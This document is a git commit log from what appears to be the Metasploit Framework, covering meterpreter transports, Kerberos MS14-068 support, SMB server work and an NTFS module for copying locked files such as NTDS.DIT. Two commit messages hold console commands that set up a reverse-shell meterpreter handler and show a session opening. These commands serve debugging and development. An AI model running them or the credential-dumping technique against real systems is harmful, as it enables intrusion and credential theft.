Brent Cook
1869977921
Land #4962: OJ adjusts MSF to new metsrv needs
...
bump meterpreter bins to 0.0.17
2015-03-23 17:18:06 -05:00
jvazquez-r7
d8d4c23d60
JMX code refactoring
2015-03-23 17:06:51 -05:00
David Maloney
60966f3d2a
handle a blank response body
...
sometimes the response body itself can be blank
so we need to handle that properly.
MSP-9972
2015-03-23 16:03:30 -05:00
jvazquez-r7
962bb670de
Remove old JMX mixin
2015-03-23 15:48:10 -05:00
OJ
9c9d333a1b
Create verify ssl mixin, adjust some formatting
2015-03-23 13:21:08 +10:00
HD Moore
bc3c73e408
Merge branch 'master' into feature/registered-payload-uuids
2015-03-22 18:51:13 -05:00
HD Moore
0d1fe37710
Ignore non-base64url characters during decode
2015-03-22 16:16:47 -05:00
HD Moore
94241b2998
First attempt at rewiring HTTP handlers to use UUIDs
2015-03-21 03:15:08 -05:00
sinn3r
97b919923e
Fix undefined esize in Rex::Exploitation::Egghunter
...
esize is not a valid variable, and we don't need it either.
2015-03-20 21:32:46 -05:00
HD Moore
858d9b1e7a
Introduce Rex::Text.(en|de)code_base64url and use it for uri_checksum
2015-03-20 21:32:08 -05:00
OJ
9d20d057dd
Update Meterpreter URL length to 512
2015-03-20 13:16:43 +10:00
oj@buffered.io
fd4ad9bd2e
Rework changes on top of HD's PR
...
This commit removes duplication, tidies up a couple of things and puts
some common code into the x509 module.
2015-03-20 13:06:57 +10:00
OJ
7ca91b2eb5
Add support for ssl to the patcher
2015-03-20 12:52:38 +10:00
OJ
a9f74383d0
Update patch to support both ascii and wchar
2015-03-20 12:52:18 +10:00
OJ
acd802c5fd
Initial work for WinHTTP comms support in Meterpreter
2015-03-20 12:51:47 +10:00
Brent Cook
564962042e
Land #4925, OJ adds self-contained windows meterpreter options
2015-03-19 21:07:32 -05:00
Brent Cook
24ce0118b8
reenable UTF filtering support where needed
...
revert d22231bdc8
2015-03-19 16:02:21 -05:00
jvazquez-r7
ec90594f7e
Add support for Rex::Java::Serialization::ProxyClassDesc
2015-03-19 15:41:24 -05:00
OJ
a582e05b6d
Merge gemfile changes in master
2015-03-20 06:29:38 +10:00
OJ
040ef1e3e9
Land #4950: ls unicode and sorting in meterpreter
2015-03-20 06:28:29 +10:00
jvazquez-r7
5c3134a616
Add first support to gather information from RMI registries
2015-03-19 11:16:04 -05:00
OJ
7899881416
Update POSIX bins from master
2015-03-19 14:50:14 +10:00
HD Moore
ae621c83c5
Add a URL-safe base64 encoder/decoder
2015-03-18 17:03:29 -05:00
Brent Cook
c774038fe6
improve ls output by providing various new options
2015-03-18 16:02:03 -05:00
David Maloney
4293af01b1
make sure we strip leading whitespace
...
in the aforementioned record_request_and_response method
we need to still make sure to strip leading whitespace
from the front of our data before saving it
MSP-9972
2015-03-18 11:23:45 -05:00
David Maloney
dacaa9e82b
simplify request-response parsing in appscan
...
the record_request_and_response method for the
nokogiri appscan parser was way overcomplicated
it was trying to do way too much trickiness
when the data could be very simply split and consumed
MSP-9972
2015-03-18 11:19:00 -05:00
David Maloney
3269817b29
remove bad truthiness checks
...
truthy checks were used here, but you'll get
an empty hash which will be treated as true causing
the test to be invalid and allowing for errors further in the method
MSP-9972
2015-03-18 10:52:24 -05:00
HD Moore
8d3cb8bde5
Fix up meterpreter patching arguments and names
2015-03-18 01:25:42 -05:00
HD Moore
390a704cc7
Cleanup proxyhost/proxyport arguments to match new names
2015-03-18 01:19:05 -05:00
jvazquez-r7
14be07a2c4
Update java_rmi_server modules
2015-03-17 21:29:52 -05:00
jvazquez-r7
6315e07312
Add specs for UniqueIdentifier
2015-03-17 20:38:43 -05:00
jvazquez-r7
87b777e923
Refactor moving code to rex
2015-03-17 17:15:32 -05:00
Brent Cook
d22231bdc8
remove unicode_filter_encode calls
...
Let the underlying utf8 messages through to the console.
2015-03-17 11:07:07 -05:00
HD Moore
11593800b6
Move X509 PEM parsing into Rex::Parser::X509Certificate
2015-03-14 15:52:23 -05:00
Brent Cook
74ee2d8408
Land #4916, @hmoore-r7 annotate Interlock Target param as 'in' only
2015-03-13 08:59:59 -05:00
OJ
1338a55b0d
Adjust error handling for extension enumeration
...
Make the catch case more generic for when the target doesn't support the
command for extension enumeration. This supports more than just windows
now.
2015-03-13 21:49:45 +10:00
William Vu
fa2fbc387c
Land #4922, REG_MULTI_SZ for type2str
2015-03-13 01:07:27 -05:00
James Lee
14a5efce58
Add yardoc
2015-03-13 01:04:23 -05:00
HD Moore
f676dc03c8
Lands #4849, prevents the target from running out of memory during NTFS reads
2015-03-12 00:01:47 -05:00
HD Moore
7252ba284a
Tweak memory usage from 64Mb to 4Mb
2015-03-11 23:58:13 -05:00
HD Moore
aa79b71e35
Fixes #4897 by corrected kernel32!Interlocked function definitions
2015-03-11 23:26:32 -05:00
OJ
345b5cc8e1
Add stageless meterpreter support
...
This commit adds plumbing which allows for the creation of stageless
meterpreter payloads that include extensions. The included transports at
this point are bind_tcp, reverse_tcp and reverse_https, all x86.
More coming for x64. Will also validate http soon.
2015-03-12 13:22:04 +10:00
James Lee
cd5699dc39
Sort cases and add specs
2015-03-08 23:27:32 -05:00
James Lee
0440e19cc1
Add REG_MULTI_SZ
2015-03-08 22:48:24 -05:00
jvazquez-r7
1c064f6b46
Land #3074, @0x41414141 SMB Share mixin
2015-03-04 10:16:04 -06:00
jvazquez-r7
64fd818364
Land #4411, @bcook-r7's support for direct, atomic registry key access in meterpreter
2015-03-04 10:01:33 -06:00
jvazquez-r7
cdf5fec474
Fix style
2015-03-04 09:57:39 -06:00
jvazquez-r7
8328c5c5e9
Add specs for SMB_FIND_FILE_BOTH_DIRECTORY_INFO requests
2015-03-03 12:43:41 -06:00
jvazquez-r7
eb3aedf4a7
Define constants for WordCount in responses
2015-02-28 18:15:14 -06:00
jvazquez-r7
89a033c194
Delete unnecessary paddings due to miscalculations
2015-02-26 15:54:00 -06:00
Bazin Danil
3aa68c30b0
=> not => !
2015-02-26 21:31:01 +01:00
Bazin Danil
a427e417a3
-consomation +consumption
2015-02-26 21:23:09 +01:00
William Vu
0a51ca12a5
Download all of every file implicitly
2015-02-26 14:10:53 -06:00
William Vu
d0ca1b2dc6
Delete a thing I added for no reason
2015-02-26 14:06:10 -06:00
William Vu
5996256ccc
Fix formatting
2015-02-26 14:05:50 -06:00
jvazquez-r7
c73ffea1b9
Do minor cleanup
2015-02-26 12:50:45 -06:00
jvazquez-r7
970f0c94b2
Create CREATE_ANDX constants
2015-02-26 10:44:07 -06:00
Matthew Hall
ab1bb0e50d
bugfixes to https://github.com/jvazquez-r7/metasploit-framework/tree/review_3074_clean_server
...
to provide consistent support for various exploits and OS SMB Commands.
Reintroduces smb_cmd_trans_query_path_info_network for use with the Struts2 JSP injection vulnerability.
Reintroduces smb_cmd_trans_query_file_info_basic for common use with rundll32.
Corrects some issues with filename formatting and pattern matching for file requests (can still be improved).
2015-02-26 16:10:34 +00:00
William Vu
ed9213eb4c
Add fsquery check to fs{download,delete} methods
2015-02-25 17:37:20 -06:00
William Vu
ea5b6f66d4
Add UEL to fsdownload method
2015-02-25 17:35:34 -06:00
William Vu
5d3c7f3b4a
Add fsquery method
2015-02-25 17:18:23 -06:00
William Vu
1f981dd336
Add FSQUERY constant
2015-02-25 17:00:27 -06:00
jvazquez-r7
993c75ec77
Update Offset counts with constants
2015-02-25 16:25:16 -06:00
William Vu
91f0713056
Add fsdelete method
2015-02-25 15:41:40 -06:00
William Vu
a096a17e21
Add FSDELETE constant
2015-02-25 15:39:51 -06:00
William Vu
80d8491d09
Add fsdownload method
2015-02-25 15:00:31 -06:00
William Vu
e8c2c3687d
Replace "pathname" with "path"
...
This always bothered me, since I usually say "path."
2015-02-25 15:00:18 -06:00
William Vu
02ea7a0282
Add FSDOWNLOAD constant
2015-02-25 15:00:11 -06:00
jvazquez-r7
df50aa0f06
Use constants for DataCount and DataCountTotal
2015-02-25 14:11:38 -06:00
jvazquez-r7
f21959a8a2
Add constants for session setup actions
2015-02-25 13:31:57 -06:00
jvazquez-r7
e967cfbfb3
Create Access rights constants
2015-02-25 13:22:16 -06:00
jvazquez-r7
1caffbea2d
Add constants for Negotiation Capabilities
2015-02-25 12:50:33 -06:00
jvazquez-r7
50d50d5353
Define constants for SMB Flags
2015-02-25 12:28:25 -06:00
jvazquez-r7
e5d9bb0a47
Update from master
2015-02-25 11:37:13 -06:00
jvazquez-r7
ec9be4531b
Add SMB_CREATE_ANDX_RES_PKT template
2015-02-25 11:33:08 -06:00
jvazquez-r7
d10385cfed
Add template for SMB_TREE_CONN_ANDX_RES_PKT
2015-02-24 19:27:25 -06:00
jvazquez-r7
642765aeb5
Delete comments
2015-02-24 18:27:02 -06:00
jvazquez-r7
bb36899699
Make template names consistent
2015-02-24 18:26:46 -06:00
jvazquez-r7
d29e9fc20b
Parse TRAN2_FIND_FIRST2 commands
2015-02-24 17:02:49 -06:00
William Vu
5f0aeda0be
Land #4835, new hex format for msfvenom
2015-02-24 10:56:47 -06:00
Christian Mehlmauer
5880702552
added new hex format
2015-02-24 16:05:02 +01:00
Brent Cook
ab4a416958
comment out duplicate keys that can only be used for reference
...
ruby is ignoring all but the second instances, and 2.2 still throws a
warning
2015-02-24 08:50:02 -06:00
William Vu
5eec07d4d1
Fix duplicate hash key "jpeg"
...
In lib/rex/proto/http/server.rb.
2015-02-24 05:19:42 -06:00
jvazquez-r7
ea483f14a1
Try to fix logic for query information levels
2015-02-23 17:17:33 -06:00
jvazquez-r7
3fca26a5de
Add support for SMB_COM_TRANSACTION2 data blocks and params
2015-02-23 16:37:39 -06:00
jvazquez-r7
a06d07d6da
Clean smb_cmd_trans2_query_file_information dispatching
2015-02-23 12:03:08 -06:00
jvazquez-r7
3d7381b62a
Handle TRANS2 commands
2015-02-23 11:33:49 -06:00
HD Moore
e5e3474af4
Handle ICMP "protocol not available" errors as connection errors
2015-02-22 16:36:53 -06:00
BAZIN-HSC
d8132f86ff
adjust buffer size
2015-02-22 08:51:16 +01:00
sinn3r
85871ab822
Fix #4382, Make errors more meaningful
...
Fix #4382
2015-02-20 20:09:58 -06:00
jvazquez-r7
52a0e6dd1c
Mark a couple of handlers for later review
2015-02-20 16:28:04 -06:00
BAZIN-HSC
0d53dc1d13
use a buffer to avoid memory use on victim's machine
...
use a buffer to avoid memory use on victim's machine
use attacker memory to store files
avoid bugs on large files
2015-02-20 20:02:09 +01:00
jvazquez-r7
a91d19e0e7
Add template for SMB_QUERY_FILE_STANDARD_INFO
2015-02-20 10:58:15 -06:00
jvazquez-r7
21978a1bfe
Add template for SMB_QUERY_FILE_BASIC_INFO
2015-02-20 10:40:45 -06:00
jvazquez-r7
cf63e09188
Add templates for SMB_FIND_FILE_FULL_DIRECTORY_INFO_HDR and SMB_FIND_FILE_NAMES_INFO_HDR
2015-02-20 09:17:51 -06:00
BAZIN-HSC
fe75a31a59
NTFS parser optimisation
...
NTFS Parser does not automatically gather non-resident attributes
that were not necessary
Railgun is called 17 times instead of 32 in an example on ntds.dit
2015-02-20 13:11:53 +01:00
jvazquez-r7
f2405a5dc0
Create SMB_FIND_FILE_BOTH_DIRECTORY_INFO_HDR_LENGTH constant
2015-02-20 00:35:26 -06:00
jvazquez-r7
571dffa317
Create template for SMB_FIND_FILE_BOTH_DIRECTORY_INFO
2015-02-20 00:22:33 -06:00
jvazquez-r7
94ad64546c
Create TRANS2_PARAMETERS template
2015-02-19 23:16:52 -06:00
jvazquez-r7
b24b94ddd3
Do first cleanup of find_first2 handlers
2015-02-19 19:08:56 -06:00
jvazquez-r7
874031b96d
Delete require
2015-02-18 13:44:31 -06:00
jvazquez-r7
415c671416
Move Rex code, we'll redesign as mixin
2015-02-18 13:44:02 -06:00
jvazquez-r7
f960a77754
Solve merging conflicts
2015-02-18 11:36:47 -06:00
Matthew Hall
934af4cee9
Merge branch 'master' into module-smbfileserver
2015-02-17 17:01:44 +00:00
Matthew Hall
49971a6bc3
Add two more constants and handlers seen during testing.
2015-02-17 16:48:11 +00:00
sinn3r
0597d2defb
Land #4560, Massive Java RMI update
2015-02-17 10:07:07 -06:00
Brent Cook
b4cf2f5d8c
use correct response filter TLV_TYPE_VALUE_NAME
2015-02-17 08:46:25 -06:00
Matthew Hall
1f6aebe3df
Move to using constant values.
...
This commit adds several constants for TRANS2, QUERY_PATH_INFO, MAX_DATA_COUNT,
and NT2 FLAG2 Bits to smb/constants.rb, which have then been utilised in smb/server.rb
to reduce the use of magic values.
2015-02-17 14:31:31 +00:00
Brent Cook
8f74f8eeed
pass down the new permissions parameters
2015-02-17 06:11:20 -06:00
Brent Cook
503f58375b
add direct registry access methods
...
Rather than operating on a passed-in HKEY, these open and close the registry
key directly for each operation.
This pattern better reflects the actual API usage within msf, and removes extra
round-trips to open and close the registry key, reducing traffic and increasing
performance. I did not add direct versions of every registry operation.
There was no benefit for more rarely-used operations, other than requiring more
churn in the meterpreters.
The primary beneficiary of this is post exploitation modules that do registry
or service enumeration. See #3693 for test cases.
2015-02-17 06:11:20 -06:00
Matthew Hall
3110c7b40f
Adds smb_cmd_trans_find_first2_full to respond to "Find File Full Directory Info" FIND_FIRST2 requests,
...
as seen when using "type \\ip\share\file".
2015-02-17 11:37:44 +00:00
sinn3r
50c72125a4
::Errno::EINVAL, disable obfuscation, revoke ms14-064
2015-02-12 11:54:01 -06:00
sinn3r
22811257db
Fix #4711 - Errno::EINVAL (getpeername(2)) BrowserAutoPwn Fix
...
This patch fixes #4711.
The problem here is that the browser sometimes will shutdown some of our
exploit's connections (in my testing, all Java), and that will cause Ruby
to call a rb_sys_fail with "getpeername(2)". The error goes all the
way to Rex::IO::StreamServer's monitor_listener method, which triggers a
"break" to quit monitoring. And then this causes another chain of reactions
that eventually forces BrowserAutoPwn to quit completely (while the
JavaScript on the browser is still running)
2015-02-10 18:28:02 -06:00
Meatballs
33560a2657
Refactor Msf::Exploit::Powershell to Rex::Powershell to allow for
...
msfvenom usage.
2015-02-10 20:53:46 +00:00
jvazquez-r7
1f4fdb5d18
Update from master
2015-02-10 10:47:17 -06:00
Meatballs
133ae4cd04
Land #4679, Windows Post Gather File from raw NTFS.
2015-02-08 18:50:50 +00:00
Bazin Danil
8cefe637df
bug with testing Win2k8 correction
2015-02-08 17:28:33 +01:00
Meatballs
358ab2590e
Small tidyup
2015-02-07 11:35:47 +00:00
Bazin Danil
970c5d115a
spellcheck
2015-02-05 22:08:39 +01:00
HD Moore
ffe0e52cb6
The iax2 stack now works properly with asterisk 1.8
...
Note that the requirecalltoken=no setting is still required in the asterisk configuration at this point.
2015-02-02 22:29:13 -06:00
HD Moore
0ba34422d5
Pass the debugging option for IAX2 Client
2015-02-02 21:08:16 -06:00
Bazin Danil
fbb85c0391
using string concatenation for performance
2015-01-31 05:13:44 +01:00
Bazin Danil
d9c64397fd
shorten the line, using more variables
2015-01-31 04:32:32 +01:00
Bazin Danil
0fce908045
add constant class
2015-01-31 04:19:27 +01:00
Bazin Danil
f4ec6bdc78
- use non-native pack/unpack directives
...
- coding: binary
- use constant for data_attribute
2015-01-31 03:59:23 +01:00
Bazin Danil
68b735dbda
Add a NTFS parser and a post module to dump files
...
This commit adds a draft of an NTFS Parser and a post module
to gather files using the raw NTFS device (\\.\C:)
bypassing restrictions like already-open files with locks
Can be used to retrieve files like NTDS.DIT without volume shadow copy
2015-01-30 19:16:44 +01:00
Meatballs
02864b4401
Railgun DWORD handling
2015-01-30 11:20:03 +00:00
William Vu
aec0067d14
Land #4673, screenshot -v hardcoded false fix
2015-01-29 19:40:15 -06:00
sinn3r
823c75908d
Fix #4672 - Fix Hardcoded false for screenshot -v
...
Fix #4672
2015-01-29 16:54:41 -06:00
Brent Cook
212aeb9106
Improve utility of meterpreter file upload command
...
Rather than assume that the destination argument is a directory, check
first, and then do the same thing that 'cp' would do.
- If dest exists and is a directory, copy to the directory.
- If dest exists and is a file, copy over the file.
- If dest does not exist and is a directory, fail.
- If dest does not exist and is a file, create the file.
2015-01-29 13:45:15 -06:00
James Lee
bb17d75425
Replace direct class comparison with kind_of?
2015-01-28 17:00:15 -06:00
Brent Cook
65d71a5e18
Fix #4625 Reenable channel receive packet requeueing logic
...
In #4475, I incorrectly interpreted the role of the 'incomplete' array
in monitor_socket, and that change should be reverted.
What appears to happen is, we play a kind of 3-card monty with the list
of received packets that are waiting for a handler to use them.
monitor_socket continually loops between putting the packets on @pqueue,
then into backlog[] to sort them, then into incomplete[] to list all of
the packets that did not have handlers, finally back into @pqueue again.
If packets don't continually get shuffled back into incomplete, they are
not copied back into @pqueue to get rescanned again.
The only reason anything should really get into incomplete[] is if we
receive a packet, but there is nothing to handle it. This scenario
sounds like a bug, but it is exactly what happens with the Tcp Client
channel - one can open a new channel, and receive a response packet back
from the channel before the subsequent read_once code runs to register a
handler to actually process it. This would be akin to your OS
speculatively accepting data on a TCP socket with no listener, then when
you open the socket for the first time, its already there.
While it would be nice if the handlers were setup before the data was
sent back, rather than relying on a handler being registered some time
between connect and PacketTimeout, this needs to get in now to stop the
bleeding. The original meterpreter crash issue from #4475 appears to be
gone as well.
2015-01-23 08:50:37 -06:00
jvazquez-r7
4311226840
Add documentation for Rex::Java::Serialization::Builder
2015-01-20 11:26:52 -06:00
jvazquez-r7
0584ae8177
Add Rex::Java::Serialization::Builder#new_object
2015-01-20 10:31:37 -06:00
jvazquez-r7
6ca86256cf
Add Rex::Java::Serialization::Builder#new_array
2015-01-20 10:23:09 -06:00
jvazquez-r7
ec57387821
Add Rex::Java::Serialization::Builder#new_class
2015-01-19 11:54:12 -06:00
jvazquez-r7
4220a5e60f
Use Rex::Java::Serialization::Builder#new_class
2015-01-19 11:53:53 -06:00
William Vu
cb0257bec7
Land #4576, OpenVAS database import fix
2015-01-18 00:45:36 -06:00
nstarke
55a746eeb7
Changing code to catch everything extraneous
2015-01-17 15:46:26 +00:00
jvazquez-r7
697e4fbd41
Land #4584, @sgabe's fix for egghunter searchforward
2015-01-16 19:36:52 -06:00
jvazquez-r7
a42b095472
Delete heaponly option
2015-01-16 19:35:57 -06:00
jvazquez-r7
859a8978e7
Allow searchforward to be a string
2015-01-16 19:33:19 -06:00
sgabe
3297d198f3
Fix search-forward option in regular egghunter
2015-01-16 22:16:30 +01:00
sgabe
95eab85df4
Add support for heap-only search in regular egghunter
2015-01-13 21:31:13 +01:00
Jon Hart
5cc7d5d1a8
Remove errant pry
2015-01-13 10:35:05 -08:00
jvazquez-r7
0babde8c1a
Fix specs
2015-01-13 10:48:23 -06:00
jvazquez-r7
4351964290
Change module filename
2015-01-13 10:46:14 -06:00
jvazquez-r7
3946b95bc3
Update rex code and specs
2015-01-13 10:45:00 -06:00
jvazquez-r7
1f0b986bf1
Change filenames
2015-01-13 10:43:27 -06:00
Jon Hart
69f03f5c5d
Move ACPP default port into Rex
2015-01-12 19:43:57 -08:00
Jon Hart
d5cdfe73ed
Big style cleanup
2015-01-12 19:11:14 -08:00
nstarke
9baae6e494
Potential Fix For OpenVAS DB Import Issue
2015-01-13 02:46:13 +00:00
Jon Hart
ec506af8ea
Make ACPP login work
2015-01-12 14:01:23 -08:00
Jon Hart
691ed2cf14
More cleanup
...
Don't validate checksums by default until they are better understood
Handle the unknowns a bit better
Make checksum failures more obvious why it failed
2015-01-12 13:08:12 -08:00
Jon Hart
97f5cbdf08
Add initial Airport ACPP login scanner
2015-01-12 13:08:12 -08:00
Jon Hart
fba6945e9a
Doc payload oddness. Add more checksum tests
2015-01-12 13:08:12 -08:00
Jon Hart
54eab4ea3d
Checksum validation, more tests
2015-01-12 13:08:12 -08:00
Jon Hart
7e4dd4e55b
Add ACPP decoding capabilities
2015-01-12 13:08:12 -08:00
Jon Hart
2af82ac987
Some preliminary Apple Airport admin protocol (ACPP?) support
2015-01-12 13:08:11 -08:00
jvazquez-r7
d59805568e
Do first module refactoring try
2015-01-07 19:06:09 -06:00
jvazquez-r7
731c2f99d1
Handle better java references
2015-01-07 15:19:28 -06:00
Meatballs
0b0ac1455a
Merge remote-tracking branch 'upstream/master' into extapi_service_post
...
Conflicts:
test/modules/post/test/services.rb
2015-01-07 20:53:34 +00:00
jvazquez-r7
ba13e9d64c
Add Stream spec
2015-01-07 12:05:44 -06:00
jvazquez-r7
98ec08ae0d
Add support for Ping and PingAck
2015-01-06 15:18:55 -06:00
jvazquez-r7
1e3b24f01b
Add support for DbgAck
2015-01-06 15:00:17 -06:00
jvazquez-r7
6d1d300e72
Add support for ReturnData
2015-01-06 12:52:00 -06:00
jvazquez-r7
825e08f5ac
Add support for Call messages
2015-01-06 12:36:06 -06:00
jvazquez-r7
f3ff42dbfb
Add support for Continuation
2015-01-06 11:34:47 -06:00
William Vu
0bece137c1
Land #4494, Object.class.to_s fix
2015-01-06 02:27:35 -06:00
jvazquez-r7
757f95a24d
Add support for ProtocolAck
2015-01-06 00:14:14 -06:00
jvazquez-r7
26da73ffb8
Change class name
2015-01-05 19:23:07 -06:00
jvazquez-r7
d5dfd75e71
Add initial model and support to OutputStream
2015-01-05 18:52:13 -06:00
Meatballs
dd5c638ab0
Merge remote-tracking branch 'upstream/master' into extapi_service_post
2015-01-05 22:18:44 +00:00
OJ
17ff546b0f
Remove unnecessary calls to expand path
...
When using the Meterpreter Binaries gem to locate the path to the
meterpreter DLLs, it's not necessary to use File.expand_path on
the result because the gem's code does this already.
This commit simply removes those unnecessary calls.
2015-01-03 08:30:26 +10:00
sinn3r
d45cdd61aa
Resolve #4507 - respond_to? + send = evil
...
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve #4507
2015-01-02 13:29:17 -06:00
Christian Mehlmauer
4f11dc009a
fixes #4490, class.to_s should not be used for checks
2014-12-31 10:46:24 +01:00
jvazquez-r7
722f86f361
Try to guess TMPDIR folder
2014-12-30 18:39:29 -06:00
jvazquez-r7
7596d211e9
Use length for comparison
2014-12-30 18:39:18 -06:00
jvazquez-r7
e903044fd5
Allow to provide writable dir
2014-12-30 18:36:30 -06:00
jvazquez-r7
f17a7e8a61
Better handling of the unix domain socket argument
2014-12-30 18:36:28 -06:00
jvazquez-r7
4df4e8b9d6
Add support for linux meterpreter migration
2014-12-30 18:34:24 -06:00
jvazquez-r7
56df2d0062
Add support for linux meterpreter migrate types
2014-12-30 18:30:15 -06:00
Tod Beardsley
135faeee29
Land #4095, specs for Rex::OLE
2014-12-30 14:25:09 -06:00
Tod Beardsley
a8e907d68b
Land #4479, nil comparisons and missing DLLs
...
Also fixes #4474.
2014-12-30 13:55:54 -06:00
Brent Cook
bdac5db695
remove usage of ==/!= nil
...
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
Jon Hart
d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363
2014-12-29 16:47:04 -08:00
sinn3r
555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support)
2014-12-29 16:09:28 -06:00
Brent Cook
5d70b837ed
handle nil results from MeterpreterBinaries.path
...
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600
meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```
This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that that's ever happened to me :)
2014-12-29 12:34:02 -06:00
Tod Beardsley
72eb8e6503
Land #4475, inverted timeout fix
2014-12-29 11:37:28 -06:00
Brent Cook
bbb41c39b8
fix backward meterpreter packet timeout logic
...
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.
This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.
This probably fixes tons of heisenbugs, including #3798.
To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:
(cd modules/post
ln -s ../../test/modules/post/test)
die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
jvazquez-r7
d148848d31
Support Kerberos error codes
2014-12-24 18:05:48 -06:00
jvazquez-r7
05a9ec05e8
raise NotImplementedError
2014-12-23 19:59:37 -06:00
jvazquez-r7
4493b3285c
Raise NoMethodError for methods designed to be overridden
2014-12-23 19:51:41 -06:00
jvazquez-r7
fee033d6df
Use Rex::Text.md5_raw
2014-12-23 19:30:23 -06:00
Matthew Hall
3c10b04673
add start of rspec tests
2014-12-23 16:35:27 +00:00
Matthew Hall
fca0484639
fix a few bugs with the code cleanup
2014-12-23 15:28:00 +00:00
Matthew Hall
6b98a7d444
Tidy up by removing some duplicate code; add framework to track payload requests through the file id
2014-12-23 14:14:06 +00:00
Meatballs
b41e259252
Move it to a common method
2014-12-23 11:16:07 +00:00
jvazquez-r7
13ec578d1a
Revert "Back to Create OpenSSL::BN from string"
...
This reverts commit 635a54ca94.
2014-12-22 23:17:03 -06:00
jvazquez-r7
635a54ca94
Revert "Create OpenSSL::BN from string"
...
This reverts commit fe99b65a62.
2014-12-22 19:14:07 -06:00
jvazquez-r7
fe99b65a62
Create OpenSSL::BN from string
2014-12-22 18:44:47 -06:00
jvazquez-r7
d12b43d257
Use Intege.new
2014-12-22 18:37:07 -06:00
jvazquez-r7
ad97457a39
Move more constants to Crypto
2014-12-22 15:27:16 -06:00
jvazquez-r7
75a2846377
Add more PAC constants
2014-12-22 15:14:46 -06:00
jvazquez-r7
5a6c915123
Clean options
2014-12-22 14:37:37 -06:00
jvazquez-r7
ff208002d7
Reorganize the Crypto mixin
2014-12-22 11:57:35 -06:00
jvazquez-r7
9f1403a63e
Add initial specs for Msf::Kerberos::Client::TgsResponse
2014-12-20 20:29:00 -06:00
jvazquez-r7
5f0c3ebb2b
Add documentation for Msf::Kerberos::Client::TgsResponse and TgsRequest
2014-12-20 19:32:38 -06:00
jvazquez-r7
e35218b6f1
Add documentation for Msf::Kerberos::Client::CacheCredential
2014-12-20 18:28:36 -06:00
Tod Beardsley
d3050de862
Remove references to Redmine in code
...
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
jvazquez-r7
fad08d7fca
Add specs for Rex Kerberos client
2014-12-19 12:14:33 -06:00
jvazquez-r7
f4037b1003
Clean Kerberos Rex client code
2014-12-19 11:08:48 -06:00
jvazquez-r7
dfa92da287
Add TODO
2014-12-19 01:13:56 -06:00
jvazquez-r7
77e2d4d90d
Add documentation for the Kerberos PAC support classes
2014-12-19 01:12:14 -06:00
jvazquez-r7
fda4cd3440
Fix some Rex Kerberos model documentation
2014-12-18 19:30:12 -06:00
jvazquez-r7
c426cf32d0
Add specs for Rex::Proto::Kerberos::CredentialCache::Principal
2014-12-18 17:40:06 -06:00
jvazquez-r7
16d5ee1aae
Add documentation for the rex credential cache support
2014-12-18 17:12:58 -06:00
jvazquez-r7
7275f5a5f2
Allow Rex to load credential_cache
2014-12-18 16:32:21 -06:00
jvazquez-r7
f325d2f60e
Add support for cache credentials in the mixin
2014-12-18 16:31:46 -06:00
jvazquez-r7
0a61e108ea
Add code skeleton for credential_cache
2014-12-18 00:30:47 -06:00
jvazquez-r7
0f19f3cf2e
Add classes templates
2014-12-17 23:16:58 -06:00
jvazquez-r7
f3f6a64f02
Add some AS response methods to a mixin
2014-12-17 19:50:42 -06:00
jvazquez-r7
8e570cc19b
Initial support to send TGS-REQ
2014-12-17 18:55:30 -06:00
jvazquez-r7
594b9bcfc2
Add support for AuthorizationData
2014-12-16 23:21:13 -06:00
HD Moore
9de4137aa7
Patch UA/Proxy settings during migration, lands #3632
2014-12-16 22:21:48 -06:00
Sean Verity
1930eb1bf8
Refactors metsrv patching in reverse_http.rb
2014-12-17 10:04:43 -05:00
jvazquez-r7
2649d482fe
Add support for KRB_AP_REQ
2014-12-16 18:39:42 -06:00
jvazquez-r7
0f55a98450
Add support for Authenticator encoding
2014-12-16 17:45:54 -06:00
jvazquez-r7
dde45a7f53
Add support for Checksum encoding
2014-12-16 17:05:35 -06:00
jvazquez-r7
a93cbac7bf
Support ticket encoding
2014-12-16 16:04:13 -06:00
jvazquez-r7
ce6b53b44c
Fix attribute description
2014-12-16 11:39:04 -06:00
jvazquez-r7
a5f8b4319f
Add support to encode PAC-TYPE
2014-12-16 11:31:27 -06:00
jvazquez-r7
1721641138
Add support for PAC-LOGON-INFO
2014-12-16 09:32:47 -06:00
Sean Verity
52b3025351
Reworked to avoid extending String class on blob per hdm's rec.
2014-12-15 21:40:41 -05:00
jvazquez-r7
c1114c180a
Add support for PAC-CLIENT-INFO
2014-12-15 17:32:51 -06:00
jvazquez-r7
64a0162e3f
Add support for PAC-SERVER-CHECKSUM
2014-12-15 17:16:43 -06:00
jvazquez-r7
482c883d36
Add the parent class for pac elements
2014-12-15 17:13:52 -06:00
jvazquez-r7
2c7139b936
Add support for PAC-PRIVSRV-CHECKSUM
2014-12-15 17:13:22 -06:00
jvazquez-r7
147ff13080
Add support to decode the encryption part of as responses
2014-12-15 11:47:08 -06:00
jvazquez-r7
643279b54b
